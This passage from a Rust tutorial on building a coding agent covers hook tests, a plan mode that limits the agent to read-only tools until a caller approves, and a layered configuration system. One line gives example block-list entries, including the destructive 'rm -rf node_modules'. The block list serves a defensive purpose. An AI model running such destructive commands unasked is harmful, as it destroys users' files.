- `test_hooks_logging_hook` -- LoggingHook records `"pre:bash"` for a PreToolCall event and returns Continue.
- `test_hooks_logging_hook_multiple_events` -- LoggingHook records all four event types in order: `["agent:start", "pre:read", "post:read", "agent:end"]`.
- `test_hooks_blocking_hook` -- BlockingHook returns `Block("bash is disabled")` for a bash PreToolCall.
- `test_hooks_blocking_hook_allows_other_tools` -- BlockingHook returns Continue for tools not in the blocked list.
- `test_hooks_registry_dispatch_continue` -- Registry with only a LoggingHook returns Continue.
- `test_hooks_registry_dispatch_block` -- Registry with LoggingHook then BlockingHook returns Block for bash.
- `test_hooks_registry_multiple_hooks_order` -- Both hooks in a two-hook registry are called for a non-blocked event.
- `test_hooks_registry_block_short_circuits` -- When a BlockingHook fires, hooks registered after it are never called.
- `test_hooks_registry_is_empty` -- Verifies `is_empty()` before and after registration.
- `test_hooks_post_tool_event` -- LoggingHook correctly formats PostToolCall events as `"post:write"`.
Key takeaway
The hook system is an event bus with three possible responses: observe (Continue), intervene (Block), or transform (ModifyArgs). Registration order determines priority, and Block short-circuits immediately. This gives users a clean extension point for custom policies without modifying the agent's core loop.
Recap
This chapter added an event-driven hook system that lets external code observe, modify, and block agent behavior at runtime:
- `HookEvent` defines four lifecycle points: `AgentStart`, `PreToolCall`, `PostToolCall`, and `AgentEnd`. Each carries the context relevant to its point in the agent loop.
- `HookAction` defines three responses: `Continue` (proceed normally), `Block` (cancel the tool call with a reason), and `ModifyArgs` (replace the tool arguments). The asymmetry between pre and post events is enforced in the hook implementations -- only pre-tool hooks can meaningfully block.
- `HookRegistry` dispatches events to hooks sequentially. `Block` short-circuits immediately. `ModifyArgs` accumulates (last writer wins). `Continue` is the default for an empty registry.
- `LoggingHook` records a short description of every event in a `Mutex<Vec<String>>` for debugging and testing. It never interferes with execution.
- `BlockingHook` blocks specific tools by name on `PreToolCall` events. It ignores everything else.
- `ShellHook` delegates to an external shell command via `tokio::process::Command`. Non-zero exits block the call. The `for_tool()` method restricts which tools trigger the command using `glob::Pattern`.
The hook system completes the safety and control layer. The permission engine (Chapter 13) enforces mode-based access rules. Safety checks (Chapter 14) catch dangerous patterns statically. Hooks (this chapter) provide the escape hatch for policies that are too specific or too dynamic to hardcode.
What's next
Chapter 16 -- Plan Mode -- ties together everything from Part III. Plan mode is a restricted execution mode where only read-only tools run. The agent can read files, search code, and reason about a task, but it cannot write, edit, or execute commands. The permission engine checks tool categories. Safety checks validate arguments. Hooks fire for observation. But nothing destructive happens. It is the ultimate guardrail: the agent plans, the user reviews, and only then does execution begin.
Check yourself
← Chapter 14: Safety Checks · Contents · Chapter 16: Plan Mode →
Chapter 16: Plan Mode
File(s) to edit: `src/planning.rs`
Test to run: `cargo test -p mini-claw-code-starter plan`
Estimated time: 50 min
Your agent can now read files, write code, run shell commands, and do all of it under a permission system with safety checks and hooks. There is one problem: it does everything at once. The model reads a file, immediately rewrites it, runs the tests, and keeps going -- all in a single uninterrupted loop. If the model misunderstands the task, it has already modified your codebase before you had a chance to say "wait, that is not what I meant."
Plan mode fixes this by splitting the agent loop into two phases. First, the agent analyzes the task using only read-only tools -- reading files, searching code, listing directories. It produces a plan. Then, the caller (you, or your UI) inspects the plan, approves it, and the agent executes with all tools available. Think before you act. It is advice that works for humans and agents alike.
This pattern is not hypothetical. Claude Code ships with a plan mode that
restricts the agent to read-only operations until the user explicitly approves
the plan. Every serious coding agent has some version of this -- a way to let
the model reason about a task before committing to changes. The distinction
between read-only and destructive tools that earlier chapters drew has been
waiting for exactly this moment.
cargo test -p mini-claw-code-starter plan
Goal
- Build a `PlanAgent` with two distinct phases: `plan()` (read-only tools only) and `execute()` (all tools available).
- Implement the `exit_plan` virtual tool that lets the LLM explicitly signal "I am done planning" without requiring a `StopReason::Stop`.
- Enforce two layers of write protection during planning: filter tool definitions so the LLM does not see write tools, and block write tool calls at execution time as a fallback.
- Maintain message continuity between phases so the execution phase has full context from the planning phase.
Why a separate agent?
You could implement plan mode as a flag on SimpleAgent -- add a plan_mode: bool field, check it in execute_tools, filter definitions accordingly. That
works but tangles two concerns. The SimpleAgent is the general-purpose agent
loop. Plan mode is a higher-level workflow with distinct phases, transitions,
and a virtual tool that does not exist in the tool set. Mixing them muddies both.
The PlanAgent is a separate struct that wraps the same building blocks --
a provider, a ToolSet -- but orchestrates them differently.
Two methods, plan() and execute(), implement the two phases. The caller
controls the transition between them. This keeps the SimpleAgent simple and
gives the PlanAgent full control over its workflow.
Claude Code takes a similar approach. Its plan mode sets PermissionMode::Plan,
which the permission engine enforces (only read-only tools pass). The UI shows
a "Plan Mode" banner and the agent's plan before asking for approval. Our
PlanAgent encapsulates the same two-phase pattern with caller-driven approval.
The PlanAgent struct
```rust
use std::collections::HashSet;
use tokio::sync::mpsc;

use crate::agent::{AgentEvent, tool_summary};
use crate::streaming::{StreamEvent, StreamProvider};
use crate::types::*;

pub struct PlanAgent<P: StreamProvider> {
    provider: P,
    tools: ToolSet,
    read_only: HashSet<&'static str>,
    plan_system_prompt: String,
    exit_plan_def: ToolDefinition,
}
```
Five fields, each with a clear role:
- `provider` -- The LLM backend. Note the `StreamProvider` bound -- the `PlanAgent` uses streaming internally for the plan/execute loop.
- `tools` -- The full tool set. During planning, only a subset is exposed. During execution, all tools are available.
- `read_only` -- An explicit set of tool names allowed during planning. Only the listed tools are available during the plan phase.
- `plan_system_prompt` -- The system prompt injected during planning. A default is provided via the `DEFAULT_PLAN_PROMPT` constant.
- `exit_plan_def` -- The `ToolDefinition` for the virtual `exit_plan` tool. This tool is injected into the plan phase's tool list but does not exist in the `ToolSet`. It is a signal, not a real tool.
The builder
The builder follows the same new() + chaining pattern as SimpleAgent.
The new() constructor creates the exit_plan_def with a description that
tells the model what it does. This definition has no parameters -- the model
just calls it to signal "I am done planning."
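To make the "signal, not a tool" idea concrete, here is a sketch of what building that definition might look like. The starter's actual `ToolDefinition` fields are not shown in this chapter, so this stand-in struct (name, description, JSON-schema-as-string) is an assumption, not the real type:

```rust
// Hypothetical stand-in for the starter's ToolDefinition, used only to
// illustrate the exit_plan definition created in PlanAgent::new().
struct ToolDefinition {
    name: &'static str,
    description: &'static str,
    parameters: &'static str, // JSON schema, as a string in this sketch
}

fn exit_plan_def() -> ToolDefinition {
    ToolDefinition {
        name: "exit_plan",
        description: "Call this tool when you have finished analyzing the \
                      task and your plan is ready for review.",
        // An empty object schema: the model just calls it, with no arguments,
        // to signal that planning is done.
        parameters: r#"{"type":"object","properties":{}}"#,
    }
}

fn main() {
    let def = exit_plan_def();
    assert_eq!(def.name, "exit_plan");
    assert!(def.parameters.contains("object"));
}
```

The description is the only behavior this "tool" has -- it exists purely so the model sees calling it as an option.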
```rust
let agent = PlanAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new())
    .read_only(&["read"])
    .plan_prompt("You are a security auditor.");
```
Two builder methods are specific to PlanAgent:
- `read_only(&[&'static str])` -- Sets the tool names allowed during planning. If you call `.read_only(&["bash", "read"])`, only `bash` and `read` are available during planning. This is useful for specialized workflows where you want the agent to run commands (like `git log` or `cargo test --dry-run`) during analysis.
- `plan_prompt(impl Into<String>)` -- Replaces the default planning system prompt. The default says "You are in PLANNING MODE. Explore the codebase using the available tools and create a plan." A custom prompt can focus the agent on a specific concern: security auditing, performance analysis, migration planning.
The two phases
The core of PlanAgent is two methods: plan() and execute(). They share
the same loop structure as the SimpleAgent's chat(), but with different tool
sets and different termination conditions. Both methods also take an
mpsc::UnboundedSender<AgentEvent> for streaming events back to the caller.
```mermaid
flowchart LR
    A["User prompt"] --> B["plan()<br/>read-only tools<br/>+ exit_plan"]
    B --> C["Plan text"]
    C --> D{"Caller<br/>approves?"}
    D -->|Yes| E["Push approval<br/>message"]
    D -->|No| F["Push feedback<br/>message"]
    F --> B
    E --> G["execute()<br/>all tools"]
    G --> H["Final result"]
```
The caller drives the transition. After plan() returns, the caller can:
- Show the plan to the user
- Push a `Message::user("Approved. Go ahead.")` into the message history
- Call `execute()` with the same message vec
Or the caller can reject the plan, push feedback, and call plan() again.
The PlanAgent does not care -- it has no built-in UI, no approval dialog.
It is a workflow agent, not a user interface.
Phase 1: plan()
The planning phase runs a restricted agent loop. Only read-only tools and the
virtual exit_plan tool are available. Both plan() and execute() delegate
to a shared run_loop() method:
```rust
pub async fn plan(
    &self,
    messages: &mut Vec<Message>,
    events: mpsc::UnboundedSender<AgentEvent>,
) -> anyhow::Result<String> {
    // Inject system prompt if needed
    // Call run_loop with Some(&self.read_only)
    unimplemented!()
}

pub async fn execute(
    &self,
    messages: &mut Vec<Message>,
    events: mpsc::UnboundedSender<AgentEvent>,
) -> anyhow::Result<String> {
    // Call run_loop with None (no restrictions)
    unimplemented!()
}
```
The run_loop() method is the shared agent loop. When allowed is Some,
only those tools plus exit_plan are permitted. When allowed is None,
all tools are available:
Here is the full implementation of run_loop:
```rust
async fn run_loop(
    &self,
    messages: &mut Vec<Message>,
    allowed: Option<&HashSet<&'static str>>,
    events: mpsc::UnboundedSender<AgentEvent>,
) -> anyhow::Result<String> {
    // Step 1: filter tool definitions
    let all_defs = self.tools.definitions();
    let defs: Vec<&ToolDefinition> = match allowed {
        Some(names) => {
            let mut filtered: Vec<&ToolDefinition> = all_defs
                .into_iter()
                .filter(|d| names.contains(d.name))
                .collect();
            filtered.push(&self.exit_plan_def);
            filtered
        }
        None => all_defs,
    };

    loop {
        // Step 2: stream the LLM response (forward text deltas to UI)
        let (stream_tx, mut stream_rx) = mpsc::unbounded_channel();
        let events_clone = events.clone();
        let forwarder = tokio::spawn(async move {
            while let Some(event) = stream_rx.recv().await {
                if let StreamEvent::TextDelta(ref text) = event {
                    let _ = events_clone.send(AgentEvent::TextDelta(text.clone()));
                }
            }
        });
        let turn = self.provider.stream_chat(messages, &defs, stream_tx).await?;
        let _ = forwarder.await;

        // Step 3: match on stop reason
        match turn.stop_reason {
            StopReason::Stop => {
                let text = turn.text.clone().unwrap_or_default();
                let _ = events.send(AgentEvent::Done(text.clone()));
                messages.push(Message::Assistant(turn));
                return Ok(text);
            }
            StopReason::ToolUse => {
                // Handle exit_plan first: it ends the plan phase immediately.
                // Clone the call id up front so `turn` can be moved into the
                // history without fighting the borrow checker.
                let exit_id = if allowed.is_some() {
                    turn.tool_calls
                        .iter()
                        .find(|c| c.name == "exit_plan")
                        .map(|c| c.id.clone())
                } else {
                    None
                };
                if let Some(id) = exit_id {
                    let text = turn.text.clone().unwrap_or_default();
                    let _ = events.send(AgentEvent::Done(text.clone()));
                    messages.push(Message::Assistant(turn));
                    messages.push(Message::ToolResult {
                        id,
                        content: "Plan submitted for review.".into(),
                    });
                    return Ok(text);
                }

                let mut results = Vec::with_capacity(turn.tool_calls.len());
                for call in &turn.tool_calls {
                    // Block tools not in the allowed set
                    if let Some(names) = allowed {
                        if !names.contains(call.name.as_str()) {
                            results.push((
                                call.id.clone(),
                                format!(
                                    "error: tool `{}` is not available in planning mode",
                                    call.name
                                ),
                            ));
                            continue;
                        }
                    }
                    // Execute allowed tools
                    let content = match self.tools.get(&call.name) {
                        Some(t) => t
                            .call(call.arguments.clone())
                            .await
                            .unwrap_or_else(|e| format!("error: {e}")),
                        None => format!("error: unknown tool `{}`", call.name),
                    };
                    results.push((call.id.clone(), content));
                }
                messages.push(Message::Assistant(turn));
                for (id, content) in results {
                    messages.push(Message::ToolResult { id, content });
                }
            }
        }
    }
}
```
The structure mirrors the SimpleAgent's chat loop. Same loop, same provider
call, same stop-reason match. But the PlanAgent uses streaming internally
via StreamProvider, and three things are different:
1. System prompt injection
Before entering the loop, plan() injects the planning system prompt at
position 0 of the message history (if not already present), telling the model
it is in planning mode.
2. Filtered tool definitions
The plan phase filters tool definitions to only include tools in the
read_only set, plus the exit_plan tool. The model cannot see write tools
in its schema, so it has no reason to call them.
3. The exit_plan escape hatch
When the model calls exit_plan, the plan phase ends immediately. The loop
pushes the assistant message and a synthetic tool result ("Plan submitted for review.")
into the history, then returns. The synthetic result is necessary because the
API requires every tool call to have a corresponding result -- without it, the
next provider call would fail.
The plan phase can end in two ways:
- `StopReason::Stop` -- The model produces a text response directly. This is the implicit exit.
- `exit_plan` tool call -- The model explicitly signals it is done analyzing. This is the explicit exit.
Both return the plan text (which may be empty if the model put its plan in tool calls rather than text).
The exit_plan tool
The exit_plan tool deserves its own section because it is unusual. It is not
a real tool. It does not exist in the ToolSet. It has no call() method. It
is a ToolDefinition with a name and description, injected into the plan
phase's tool list so the model sees it as an option.
Why not just rely on StopReason::Stop? In principle you could: tell the
model "when you are done planning, emit your plan as plain text and stop."
In practice this fights against two behaviours baked into most instruction-tuned
models.
- When tools are visible, models keep using them. Present a model with `read`, `glob`, `grep`, and a user prompt, and it will happily spend ten turns exploring the codebase before producing any narrative output. There is no natural stopping gradient -- one more `grep` is always plausible. Without a deliberate stopping signal, the plan phase drags on.
- Plain-text stops are easy to mistake for partial work. A model that ends a turn with "Next, I need to check how X is wired" is signalling "I am still working" even when `stop_reason == Stop`. The caller cannot easily distinguish a finished plan from a mid-thought pause.
exit_plan sidesteps both problems. It is a tool the model must actively
choose to call, which reads as an explicit commitment ("I am ready"). The
plan text arrives in the same assistant message as the call, so the plan and
the stop signal land together in one structured turn. And because it lives in
the same tool-call slot the model is already used to, the behaviour composes
naturally with the rest of the loop. It is a social contract expressed as a
tool schema.
When the model calls exit_plan, the loop detects it by name, pushes the
assistant message, finds the call's ID, and pushes a synthetic ToolResult
with "Plan submitted for review." The synthetic result is important -- the message
protocol requires every ToolCall to have a matching ToolResult. Skip it
and the next API call fails with a malformed request.
Phase 2: execute()
The execution phase is a standard agent loop with the full tool set. No
filtering, no virtual tools, no special termination. The execute() method
calls run_loop(messages, None, events) -- passing None for the allowed set
means all tools are available.
The key point: execute() receives the same &mut Vec<Message> that plan()
used. The message history from planning -- the system prompt, the user request,
the read-only tool calls, the plan text -- is all still there. The model enters
execution with full context of what it analyzed and what it decided to do. This
continuity is what makes the two-phase pattern effective. The model does not
start from scratch; it picks up where it left off.
Between plan() and execute(), the caller typically pushes a user message:
```rust
let (tx, _rx) = mpsc::unbounded_channel();
let plan = agent.plan(&mut messages, tx.clone()).await?;
println!("Plan: {plan}");

// User approves
messages.push(Message::user("Approved. Go ahead."));
let result = agent.execute(&mut messages, tx).await?;
```
This approval message becomes part of the context for execution. The model sees it and knows it has permission to proceed with modifications.
Defense in depth: tool filtering
The plan phase uses two layers of protection to prevent write operations:
Layer 1: Definition filtering
The run_loop method filters the tool schemas sent to the model when an
allowed set is provided. Only tools whose names are in the set are included,
plus exit_plan.
If the model does not see a tool in its schema, it has no reason to call it. This is the primary defense -- remove the temptation.
Layer 2: Execution guard
Even if the model somehow requests a blocked tool (hallucination, prompt
injection, or a creative interpretation of the schema), the run_loop method
catches it. For each tool call, three things happen:
1. `exit_plan` is handled specially -- When the model calls `exit_plan`, the loop returns the plan text immediately. A synthetic tool result is pushed so the message history stays valid.
2. Blocked tools return errors -- If a tool is not in the `allowed` set, the tool is not executed. Instead, an error string is returned to the model. The model sees this error, understands the constraint, and adjusts.
3. Allowed tools execute normally -- Lookup, call, return result. The same pipeline as the SimpleAgent's tool execution.
Both layers must fail for a write operation to slip through during planning.
Key Rust concept: HashSet<&'static str> for zero-cost string sets
The read_only field uses &'static str rather than String. This means the set contains references to string literals that live for the entire program -- no heap allocation, no cloning. The 'static lifetime tells the compiler these strings never become invalid, which is always true for string literals like "read" or "bash". The trade-off is that you can only put compile-time-known strings into the set, not dynamically generated ones. For tool names, which are always known at compile time, this is the ideal choice.
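The trade-off is easy to see in isolation. This sketch builds such a set from literals and shows that lookups work with ordinary `&str` values:

```rust
use std::collections::HashSet;

fn main() {
    // String literals live for the whole program, so the set stores
    // borrowed &'static str values -- no heap-allocated Strings, no clones.
    let read_only: HashSet<&'static str> =
        ["read", "glob", "grep"].into_iter().collect();

    // Lookups take any &str, thanks to Borrow<str>, so a runtime tool
    // name (e.g. from a parsed tool call) can still be checked.
    let tool_name = String::from("write");
    assert!(read_only.contains("read"));
    assert!(!read_only.contains(tool_name.as_str()));
}
```

Inserting a dynamically built `String` would not compile here, which is exactly the constraint described above.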
The read_only set
The read_only field is a HashSet<&'static str> containing the tool names
allowed during planning. It is set via the read_only() builder method:
```rust
pub fn read_only(mut self, names: &[&'static str]) -> Self {
    self.read_only = names.iter().cloned().collect();
    self
}
```
Unlike the reference implementation which can fall back to checking
is_read_only() flags on tools, the starter requires you to explicitly name
the allowed tools. This is simpler -- there are no is_read_only() or
is_destructive() methods on the Tool trait in the starter.
System prompt injection
The plan phase injects a system message to tell the model it is in planning
mode. This is handled by maybe_inject_plan_prompt():
```rust
fn maybe_inject_plan_prompt(&self, messages: &mut Vec<Message>) {
    // Don't inject if a system message already exists
    let has_system = messages
        .first()
        .is_some_and(|m| matches!(m, Message::System(_)));
    if !has_system {
        messages.insert(0, Message::System(self.plan_system_prompt.clone()));
    }
}
```
Three design decisions here:
1. Respect existing system prompts -- The method checks whether the first message is already a `Message::System`. If the caller already set a system prompt (e.g., "You are a security auditor"), plan mode respects it rather than overwriting it. If `plan()` is called twice, the second call finds the existing message and skips injection.
2. Position 0 -- The planning prompt is inserted at the beginning of the message list, before any existing messages. System prompts at position 0 have the strongest influence on model behavior.
3. Custom or default -- If `plan_prompt()` was called on the builder, that text is used. Otherwise, the default tells the model it is in planning mode, should use read-only tools, and should call `exit_plan` when done.
The full plan-execute flow
Let's trace through a realistic scenario to see how everything fits together. The user wants to copy a source file to a new location.
Setup:
```rust
let engine = PlanAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new());
let mut messages = vec![Message::user("Copy src.txt to dst.txt")];
```
Plan phase -- plan() injects the planning system prompt, filters
definitions to [read, exit_plan] (write is excluded), and enters the loop.
The model calls read(path="src.txt"), sees the contents, and returns
"I'll copy src.txt to dst.txt."
Approval -- The caller prints the plan and pushes a user message:
```rust
println!("Plan: {}", plan);
messages.push(Message::user("Approved. Go ahead."));
```
Execute phase -- execute() exposes all tools. The model calls
write(path="dst.txt", content="source content"), the file is created on disk,
and the model returns "Done! Copied the file."
The message history at the end contains the complete trace: planning system prompt, user request, read-only analysis, plan text, approval, write operation, final confirmation. The model had full context at every step.
Event streaming: plan_with_events()
Like SimpleAgent, the PlanAgent has an event-streaming variant.
The plan/execute methods take an mpsc::UnboundedSender<AgentEvent> and emit
ToolCall, TextDelta, Done, and Error events as the phase runs.
The pattern mirrors run_with_events() from the agent module.
A TUI would use this to show a spinner while the agent reads files during
planning, display the plan text as it streams, and prompt the user for approval
before calling execute().
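The consumer side of that pattern can be sketched with std::sync::mpsc in place of tokio's unbounded channel (a deliberate simplification -- the starter uses the async variant, and its AgentEvent carries more data than the reduced enum here):

```rust
use std::sync::mpsc;

// Reduced event enum for illustration; the starter's AgentEvent has more variants and fields.
#[derive(Debug)]
enum AgentEvent {
    ToolCall(String),
    TextDelta(String),
    Done,
}

// Drain the receiver, printing tool calls and accumulating streamed plan text.
fn drain(rx: mpsc::Receiver<AgentEvent>) -> String {
    let mut plan_text = String::new();
    for event in rx {
        match event {
            AgentEvent::ToolCall(name) => println!("[tool] {name}"),
            AgentEvent::TextDelta(chunk) => plan_text.push_str(&chunk),
            AgentEvent::Done => println!("[done]"),
        }
    }
    plan_text
}

fn main() {
    let (tx, rx) = mpsc::channel();
    // In the real agent, plan_with_events() would emit on `tx` while the loop runs.
    tx.send(AgentEvent::ToolCall("read".into())).unwrap();
    tx.send(AgentEvent::TextDelta("I'll copy src.txt to dst.txt.".into())).unwrap();
    tx.send(AgentEvent::Done).unwrap();
    drop(tx); // Close the channel so the drain loop terminates.
    assert_eq!(drain(rx), "I'll copy src.txt to dst.txt.");
}
```

A TUI would run the drain loop on its render thread, turning ToolCall into a spinner and TextDelta into streamed plan text before prompting for approval.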
How Claude Code does it
Claude Code's plan mode follows the same two-phase pattern but integrates more deeply with the permission system.
| Feature | Our PlanAgent | Claude Code |
|---|---|---|
| Tool filtering | Explicit read-only set | PermissionMode::Plan flag |
| UI integration | Caller-driven (no built-in UI) | "Plan Mode" banner in TUI |
| Approval flow | Caller pushes user message | UI dialog with approve/reject |
| System prompt | Tagged plan_mode message | Mode-specific prompt section |
| Exit signal | exit_plan virtual tool | Mode transition in permission engine |
| Write blocking | Two layers (definitions + execution) | Permission engine rejects non-read-only |
The biggest difference is where the enforcement happens. In Claude Code, the
permission engine handles it -- plan mode is just another permission mode that
rejects non-read-only tool calls. The SimpleAgent does not need to know about
plan mode at all. Our approach is simpler and self-contained: everything about
plan mode lives in one struct, at the cost of less flexibility for "semi-plan"
modes that allow some writes but not others.
Tests
Run the plan mode tests:
cargo test -p mini-claw-code-starter plan
Key tests:
- test_plan_plan_text_response -- Plan phase returns text directly when the LLM responds with StopReason::Stop.
- test_plan_plan_with_read_tool -- Plan phase allows read tool calls and returns the plan text.
- test_plan_plan_blocks_write_tool -- Plan phase blocks write tool calls, returns an error to the LLM, and verifies the file was not created on disk.
- test_plan_plan_blocks_edit_tool -- Plan phase blocks edit tool calls and the original file remains unchanged.
- test_plan_execute_allows_write_tool -- Execute phase permits writes and the file is created on disk.
- test_plan_full_plan_then_execute -- Complete two-phase flow: plan reads a file, execution writes to a new file.
- test_plan_message_continuity -- Message history grows correctly across plan and execute phases (system + user + assistant messages accumulate).
- test_plan_read_only_override -- Custom read_only(&["read"]) excludes bash from the plan phase.
- test_plan_streaming_events_during_plan -- Plan phase emits TextDelta and Done events through the channel.
- test_plan_exit_plan_tool -- The virtual exit_plan tool ends planning and injects a synthetic tool result.
- test_plan_system_prompt_injected -- Plan phase inserts a PLANNING MODE system message at position 0.
- test_plan_system_prompt_not_duplicated -- Calling plan() twice does not duplicate the system prompt.
- test_plan_exit_plan_not_in_execute -- During execute, exit_plan is treated as an unknown tool.
- test_plan_custom_plan_prompt -- Custom plan prompt replaces the default planning instructions.
- test_plan_full_flow_with_exit_plan -- End-to-end: read during planning, exit_plan, approve, write during execution.
Key takeaway
Plan mode is caller-driven separation of concerns: the agent analyzes with read-only tools first, the caller reviews and approves, then the agent executes with the full tool set. The same message history flows through both phases, giving the execution phase complete context from the planning phase.
Recap
Plan mode completes Part III -- Safety & Control. Over four chapters you built the layers that turn a reckless agent into a disciplined one:
- Chapter 13: Permission Engine -- Checks every tool call against permission rules before execution. Ask, allow, or deny based on the tool and the mode.
- Chapter 14: Safety Checks -- Static analysis of tool arguments. Catches dangerous patterns before the permission prompt appears.
- Chapter 15: Hook System -- Pre-tool and post-tool hooks for custom policies. Run linters after edits, block certain paths, enforce project rules.
- Chapter 16: Plan Mode -- A two-phase workflow that separates analysis from action. The agent reads and reasons first, then modifies only after approval.
The key architectural insight is caller-driven approval. The PlanAgent
does not prompt the user, display a dialog, or make assumptions about the UI.
It runs the plan, returns the text, and waits. The caller decides what to do
next. This separation of concerns -- engine logic vs. user interaction -- is
what makes the same PlanAgent work in a CLI, a TUI, a web interface, or a
test harness.
What's next
Part III gave your agent safety and control. Part IV -- Configuration -- builds the systems that make your agent project-aware:
- Chapter 17: Settings Hierarchy -- Layered configuration from global defaults to project-specific overrides.
- Chapter 18: Project Instructions -- Loading and assembling CLAUDE.md files that tell the agent how to work with this specific codebase.
The safety infrastructure you built in Part III protects the agent from doing harm. The configuration infrastructure in Part IV teaches it to do good.
Check yourself
← Chapter 15: Hooks · Contents · Chapter 17: Settings Hierarchy →
Chapter 17: Settings Hierarchy
File(s) to edit: src/config.rs, src/usage.rs
Tests to run: cargo test -p mini-claw-code-starter config (Config, ConfigLoader) and cargo test -p mini-claw-code-starter cost_tracker (CostTracker)
Estimated time: 60 min
Your agent works. It reads files, writes code, runs commands, checks permissions, enforces safety rules, and restricts itself in plan mode. But every one of those behaviors is hardcoded. The model name is a string literal. The blocked commands list is baked into the source. The maximum context window is a constant. If you want to change any of them, you recompile.
Real tools do not work this way. A developer using Claude Code on a Rust project wants different settings than one working on a Python monorepo. A CI pipeline needs different defaults than an interactive session. A user who routes through a self-hosted proxy needs a different base URL. The agent must be configurable -- and the configuration must come from multiple sources, layered by priority, so that project settings override user settings, and environment variables override everything.
This chapter builds a 4-level configuration hierarchy and a cost tracker. By the end, both the config tests (Config, ConfigLoader) and the cost_tracker tests (CostTracker) should pass.
cargo test -p mini-claw-code-starter config # Config, ConfigLoader
cargo test -p mini-claw-code-starter cost_tracker # CostTracker
Goal
- Define a Config struct with serde defaults so that partial TOML files deserialize into complete configurations.
- Define a ConfigOverlay struct whose fields are Option<T>, so the loader can tell "field not set in the TOML" apart from "field explicitly set to the default value."
- Implement the merge() function with a single rule: every Some(_) in the overlay replaces the base.
- Build ConfigLoader to assemble four layers (defaults, project config, user config, environment variables) in priority order.
- Implement CostTracker to accumulate token counts and compute running cost estimates from per-million pricing.
Why layers?
A flat config file would be simple. One config.toml, one source of truth, done. But it breaks down immediately in practice:
- User preferences like model choice and API base URL should follow you across every project. You should not have to set model = "anthropic/claude-sonnet-4-20250514" in every repository.
- Project settings like blocked commands and protected file patterns are specific to one codebase. A node project might block rm -rf node_modules while a Rust project blocks cargo publish --allow-dirty.
- Environment overrides let CI pipelines inject settings without touching config files. MINI_CLAW_MODEL=anthropic/claude-haiku-3-20250414 in a GitHub Actions workflow switches to a cheaper model for automated checks.
- Defaults provide sane behavior when nothing is configured at all.
The solution is layered configuration. Each layer can set any field. Higher-priority layers override lower ones. Fields not set in a layer fall through to the next one down.
Priority (highest to lowest):
1. Environment variables -- MINI_CLAW_MODEL, MINI_CLAW_BASE_URL, MINI_CLAW_MAX_TOKENS
2. User config -- ~/.config/mini-claw/config.toml
3. Project config -- .claw/config.toml
4. Defaults -- hardcoded in code
Claude Code uses the same approach. Its hierarchy goes: CLI flags > environment > user settings > project settings > defaults. The merge logic is more sophisticated -- it supports per-key overrides and array merging strategies -- but the architecture is identical.
flowchart TD
A["Config::default()"] -->|merge| B["Project config<br/>.claw/config.toml"]
B -->|merge| C["User config<br/>~/.config/mini-claw/config.toml"]
C -->|override| D["Environment variables<br/>MINI_CLAW_MODEL, etc."]
D --> E["Final Config"]
style A fill:#e8e8e8
style E fill:#c8e6c9
The Config struct
All configuration lives in a single Config struct in src/config.rs:
```rust
use std::path::{Path, PathBuf};
use serde::{Deserialize, Serialize};

#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Config {
    #[serde(default = "default_model")]
    pub model: String,
    #[serde(default = "default_base_url")]
    pub base_url: String,
    #[serde(default = "default_max_tokens")]
    pub max_context_tokens: u64,
    #[serde(default = "default_preserve_recent")]
    pub preserve_recent: usize,
    #[serde(default)]
    pub allowed_directory: Option<String>,
    #[serde(default)]
    pub protected_patterns: Vec<String>,
    #[serde(default)]
    pub blocked_commands: Vec<String>,
    #[serde(default)]
    pub instructions: Option<String>,
}
```
Eight fields spanning three categories: provider settings, safety settings, and agent behavior.
Provider settings
model identifies which LLM to use. The default is "anthropic/claude-sonnet-4-20250514" -- an OpenRouter model path. If a user routes through a different provider or wants a cheaper model for testing, they override this.
base_url is the API endpoint. The default points to OpenRouter (https://openrouter.ai/api/v1). Users running a local proxy, a corporate gateway, or a different OpenAI-compatible API change this to point at their endpoint.
max_context_tokens caps the context window at 200,000 tokens. A compaction engine would read this value to decide when to summarize old messages. Different models have different context limits -- Haiku supports 200K, but a self-hosted model might only handle 8K.
Safety settings
allowed_directory restricts file operations to a single directory tree. When set, the Write, Edit, and Read tools refuse to touch anything outside this path. This is a blunt but effective sandbox -- useful in CI where the agent should only modify the checkout directory.
protected_patterns is a list of glob patterns for files that cannot be written to. A project might protect *.lock files, .env, or Cargo.toml to prevent the agent from accidentally modifying build-critical files.
blocked_commands lists command substrings that the bash tool rejects. If any blocked substring appears in a command, execution is denied. This is the configuration surface for the safety checks from Chapter 14.
Agent behavior
preserve_recent controls how many recent messages the compaction engine preserves. When compacting, the engine summarizes older messages but keeps the most recent preserve_recent messages intact so the model has fresh context. The default of 10 keeps roughly the last 2-3 tool-use rounds.
instructions injects custom text into the system prompt. This is where project-specific guidance goes -- "always use async/await", "prefer Vec over slices in public APIs", "tests must use the mock provider". Chapter 18 builds the full instruction system; this field is the config hook for it.
Key Rust concept: #[serde(default)] for partial deserialization
Serde's default attribute is what makes partial config files work. When a TOML file omits a field, serde normally fails with "missing field." The #[serde(default = "function_name")] attribute tells serde to call the named function instead of failing. For fields that default to None or empty Vec, the simpler #[serde(default)] calls Default::default(). This pattern is idiomatic in Rust configuration: every field has a sensible default, and the user only specifies what they want to change. The alternative -- requiring every field in every config file -- would make partial configs impossible.
Default functions and the serde trick
Each field with a non-trivial default uses a named function:
```rust
fn default_model() -> String { "anthropic/claude-sonnet-4-20250514".into() }
fn default_base_url() -> String { "https://openrouter.ai/api/v1".into() }
fn default_max_tokens() -> u64 { 200_000 }
fn default_preserve_recent() -> usize { 10 }
```
The #[serde(default = "default_model")] attribute tells serde to call default_model() when the model field is missing from the TOML input. This is what makes partial config files work. A project config that only sets blocked_commands still deserializes into a full Config -- every omitted field gets its default.
Fields that default to "empty" (Option<String>, Vec<String>) use the simpler #[serde(default)] attribute, which calls Default::default() -- None for Option, empty Vec for collections.
The Default impl for Config mirrors these functions exactly:
```rust
impl Default for Config {
    fn default() -> Self {
        Self {
            model: default_model(),
            base_url: default_base_url(),
            max_context_tokens: default_max_tokens(),
            preserve_recent: default_preserve_recent(),
            allowed_directory: None,
            protected_patterns: Vec::new(),
            blocked_commands: Vec::new(),
            instructions: None,
        }
    }
}
```
Having both the Default impl and the serde defaults is intentional. Config::default() is used in code -- constructing a base config, comparing against defaults in the merge logic. The #[serde(default = "...")] attributes are used during deserialization. They must agree, and sharing the same named functions guarantees they do.
The overlay: telling "unset" from "set to default"
Before we can write the merge function, we need a way to answer a question that Config itself cannot answer: was this field actually set in the TOML file?
